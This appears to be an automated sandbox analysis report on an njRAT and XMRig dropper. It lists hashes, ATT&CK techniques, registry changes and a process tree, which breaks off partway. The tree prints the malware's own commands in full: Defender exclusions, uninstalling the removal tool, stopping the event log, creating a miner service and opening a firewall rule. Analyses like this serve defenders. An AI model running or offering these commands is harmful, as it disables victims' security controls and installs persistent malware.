njrat | 461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-02-2025 06:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
Size

57.6MB
MD5

0956d30facdbb958dabe6d13e751976f
SHA1

80cd8d27d451f221c58541a68566d49463d97aeb
SHA256

461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c
SHA512

c0457356da8ea38a4b7445b79e8d7bd95b76fbdfd6707b84df2bd0f8cf62f65316b7bc6c34c4c2044f35a7cb6bf937c9efcb73760581e5514e6cb1776f17a463
SSDEEP

1572864:Lf3VbWblqQ2LTbGk2kR0zvpspjSG/kt7Rb2n6CL0d:r3VLHbGkjRM+SGx6Uo

Score

10^/10

njrat xmrig defense_evasion discovery execution miner persistence privilege_escalation spyware stealer trojan upx

Malware Config

Signatures

Njrat family
njrat
Xmrig family
xmrig
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral2/memory/756-114-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/756-115-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/756-118-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/756-120-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/756-119-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/756-117-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/756-121-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/1852-393-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1852-391-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1852-400-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1852-399-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1852-398-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1852-396-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1852-397-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1852-403-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/756-404-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe
4264	powershell.exe
4120	powershell.exe
744	powershell.exe
4156	powershell.exe
4688	powershell.exe
2256	powershell.exe
4008	powershell.exe
4156	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4508	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Server.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Rename_Z60IHLDjO6.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aa63d8c3a8435a58d0b9f32e46b3a601.exe	Windows Defender.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aa63d8c3a8435a58d0b9f32e46b3a601.exe	Windows Defender.exe

Executes dropped EXE 8 IoCs

pid	Process
404	Server.exe
1172	Windows Defender.exe
2076	build.exe
684	dlpwxhhxvcgc.exe
2028	FiveM.exe
2204	Rename_Z60IHLDjO6.exe
3504	services64.exe
4500	sihost64.exe

Loads dropped DLL 1 IoCs

pid	Process
2204	Rename_Z60IHLDjO6.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aa63d8c3a8435a58d0b9f32e46b3a601 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .."	Windows Defender.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\aa63d8c3a8435a58d0b9f32e46b3a601 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .."	Windows Defender.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rename_Z60IHLDjO6 = "C:\\ProgramData\\Update.vbs"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
46	discord.com
48	discord.com

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
5104	cmd.exe
3052	cmd.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	dlpwxhhxvcgc.exe
File created	C:\Windows\System32\ngnfqStZCr.txt	Rename_Z60IHLDjO6.exe
File opened for modification	C:\Windows\System32\ngnfqStZCr.txt	Rename_Z60IHLDjO6.exe
File opened for modification	C:\Windows\system32\MRT.exe	build.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1368	tasklist.exe
1404	tasklist.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 684 set thread context of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 set thread context of 756	684	dlpwxhhxvcgc.exe	117
PID 1860 set thread context of 1852	1860	conhost.exe	176

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/756-109-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-114-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-113-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-115-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-112-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-111-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-110-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-118-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-120-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-119-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-117-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-121-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/756-404-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1524	sc.exe
4368	sc.exe
3952	sc.exe
5040	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Defender.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
64	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2076	build.exe
2256	powershell.exe
2256	powershell.exe
2076	build.exe
2076	build.exe
2076	build.exe
2076	build.exe
2076	build.exe
684	dlpwxhhxvcgc.exe
4008	powershell.exe
4008	powershell.exe
684	dlpwxhhxvcgc.exe
684	dlpwxhhxvcgc.exe
684	dlpwxhhxvcgc.exe
3168	conhost.exe
4156	powershell.exe
4156	powershell.exe
4156	powershell.exe
2968	powershell.exe
2968	powershell.exe
2968	powershell.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
4100	powershell.exe
4100	powershell.exe
4100	powershell.exe
3556	powershell.exe
3556	powershell.exe
3556	powershell.exe
4120	powershell.exe
4120	powershell.exe
4120	powershell.exe
744	powershell.exe
744	powershell.exe
744	powershell.exe
1860	conhost.exe
1860	conhost.exe
4156	powershell.exe
4156	powershell.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe
1852	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1172	Windows Defender.exe
Token: 33	1172	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	1172	Windows Defender.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeLockMemoryPrivilege	756	svchost.exe
Token: 33	1172	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	1172	Windows Defender.exe
Token: 33	1172	Windows Defender.exe
Token: SeIncBasePriorityPrivilege	1172	Windows Defender.exe
Token: SeDebugPrivilege	3168	conhost.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	1368	tasklist.exe
Token: SeDebugPrivilege	1404	tasklist.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeIncreaseQuotaPrivilege	4480	WMIC.exe
Token: SeSecurityPrivilege	4480	WMIC.exe
Token: SeTakeOwnershipPrivilege	4480	WMIC.exe
Token: SeLoadDriverPrivilege	4480	WMIC.exe
Token: SeSystemProfilePrivilege	4480	WMIC.exe
Token: SeSystemtimePrivilege	4480	WMIC.exe
Token: SeProfSingleProcessPrivilege	4480	WMIC.exe
Token: SeIncBasePriorityPrivilege	4480	WMIC.exe
Token: SeCreatePagefilePrivilege	4480	WMIC.exe
Token: SeBackupPrivilege	4480	WMIC.exe
Token: SeRestorePrivilege	4480	WMIC.exe
Token: SeShutdownPrivilege	4480	WMIC.exe
Token: SeDebugPrivilege	4480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4480	WMIC.exe
Token: SeRemoteShutdownPrivilege	4480	WMIC.exe
Token: SeUndockPrivilege	4480	WMIC.exe
Token: SeManageVolumePrivilege	4480	WMIC.exe
Token: 33	4480	WMIC.exe
Token: 34	4480	WMIC.exe
Token: 35	4480	WMIC.exe
Token: 36	4480	WMIC.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeIncreaseQuotaPrivilege	4480	WMIC.exe
Token: SeSecurityPrivilege	4480	WMIC.exe
Token: SeTakeOwnershipPrivilege	4480	WMIC.exe
Token: SeLoadDriverPrivilege	4480	WMIC.exe
Token: SeSystemProfilePrivilege	4480	WMIC.exe
Token: SeSystemtimePrivilege	4480	WMIC.exe
Token: SeProfSingleProcessPrivilege	4480	WMIC.exe
Token: SeIncBasePriorityPrivilege	4480	WMIC.exe
Token: SeCreatePagefilePrivilege	4480	WMIC.exe
Token: SeBackupPrivilege	4480	WMIC.exe
Token: SeRestorePrivilege	4480	WMIC.exe
Token: SeShutdownPrivilege	4480	WMIC.exe
Token: SeDebugPrivilege	4480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4480	WMIC.exe
Token: SeRemoteShutdownPrivilege	4480	WMIC.exe
Token: SeUndockPrivilege	4480	WMIC.exe
Token: SeManageVolumePrivilege	4480	WMIC.exe
Token: 33	4480	WMIC.exe
Token: 34	4480	WMIC.exe
Token: 35	4480	WMIC.exe
Token: 36	4480	WMIC.exe
Token: SeDebugPrivilege	744	powershell.exe
Token: SeIncreaseQuotaPrivilege	1572	WMIC.exe
Token: SeSecurityPrivilege	1572	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4800 wrote to memory of 404	4800	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	84
PID 4800 wrote to memory of 404	4800	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	84
PID 4800 wrote to memory of 404	4800	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	84
PID 404 wrote to memory of 1172	404	Server.exe	86
PID 404 wrote to memory of 1172	404	Server.exe	86
PID 404 wrote to memory of 1172	404	Server.exe	86
PID 4800 wrote to memory of 2076	4800	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	87
PID 4800 wrote to memory of 2076	4800	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	87
PID 1172 wrote to memory of 4508	1172	Windows Defender.exe	93
PID 1172 wrote to memory of 4508	1172	Windows Defender.exe	93
PID 1172 wrote to memory of 4508	1172	Windows Defender.exe	93
PID 744 wrote to memory of 4460	744	cmd.exe	103
PID 744 wrote to memory of 4460	744	cmd.exe	103
PID 4800 wrote to memory of 2028	4800	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	110
PID 4800 wrote to memory of 2028	4800	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	110
PID 684 wrote to memory of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 wrote to memory of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 wrote to memory of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 wrote to memory of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 wrote to memory of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 wrote to memory of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 wrote to memory of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 wrote to memory of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 wrote to memory of 1708	684	dlpwxhhxvcgc.exe	115
PID 684 wrote to memory of 756	684	dlpwxhhxvcgc.exe	117
PID 684 wrote to memory of 756	684	dlpwxhhxvcgc.exe	117
PID 684 wrote to memory of 756	684	dlpwxhhxvcgc.exe	117
PID 684 wrote to memory of 756	684	dlpwxhhxvcgc.exe	117
PID 684 wrote to memory of 756	684	dlpwxhhxvcgc.exe	117
PID 4304 wrote to memory of 4528	4304	cmd.exe	118
PID 4304 wrote to memory of 4528	4304	cmd.exe	118
PID 2028 wrote to memory of 3168	2028	FiveM.exe	121
PID 2028 wrote to memory of 3168	2028	FiveM.exe	121
PID 2028 wrote to memory of 3168	2028	FiveM.exe	121
PID 4800 wrote to memory of 2204	4800	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	122
PID 4800 wrote to memory of 2204	4800	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe	122
PID 3168 wrote to memory of 1348	3168	conhost.exe	124
PID 3168 wrote to memory of 1348	3168	conhost.exe	124
PID 1348 wrote to memory of 4156	1348	cmd.exe	126
PID 1348 wrote to memory of 4156	1348	cmd.exe	126
PID 3168 wrote to memory of 3492	3168	conhost.exe	127
PID 3168 wrote to memory of 3492	3168	conhost.exe	127
PID 2204 wrote to memory of 4712	2204	Rename_Z60IHLDjO6.exe	129
PID 2204 wrote to memory of 4712	2204	Rename_Z60IHLDjO6.exe	129
PID 3492 wrote to memory of 64	3492	cmd.exe	130
PID 3492 wrote to memory of 64	3492	cmd.exe	130
PID 4712 wrote to memory of 2968	4712	cmd.exe	131
PID 4712 wrote to memory of 2968	4712	cmd.exe	131
PID 1348 wrote to memory of 4264	1348	cmd.exe	132
PID 1348 wrote to memory of 4264	1348	cmd.exe	132
PID 2968 wrote to memory of 3604	2968	powershell.exe	133
PID 2968 wrote to memory of 3604	2968	powershell.exe	133
PID 3604 wrote to memory of 4756	3604	csc.exe	134
PID 3604 wrote to memory of 4756	3604	csc.exe	134
PID 2204 wrote to memory of 2888	2204	Rename_Z60IHLDjO6.exe	135
PID 2204 wrote to memory of 2888	2204	Rename_Z60IHLDjO6.exe	135
PID 2888 wrote to memory of 1368	2888	cmd.exe	136
PID 2888 wrote to memory of 1368	2888	cmd.exe	136
PID 2204 wrote to memory of 1788	2204	Rename_Z60IHLDjO6.exe	137
PID 2204 wrote to memory of 1788	2204	Rename_Z60IHLDjO6.exe	137
PID 2204 wrote to memory of 5104	2204	Rename_Z60IHLDjO6.exe	138
PID 2204 wrote to memory of 5104	2204	Rename_Z60IHLDjO6.exe	138
PID 1788 wrote to memory of 1404	1788	cmd.exe	139
PID 1788 wrote to memory of 1404	1788	cmd.exe	139

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe
"C:\Users\Admin\AppData\Local\Temp\461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4800
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:404
- - C:\Users\Admin\AppData\Roaming\Windows Defender.exe
    "C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1172
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Windows Defender.exe" "Windows Defender.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:4508
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\build.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2076
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:744
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4460
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "PVYZKASM"
    3⤵
    - Launches sc.exe
    PID:1524
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "PVYZKASM" binpath= "C:\ProgramData\kmmnqxgtotnx\dlpwxhhxvcgc.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4368
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3952
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "PVYZKASM"
    3⤵
    - Launches sc.exe
    PID:5040
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3168
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1348
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
  - - C:\Windows\System32\cmd.exe
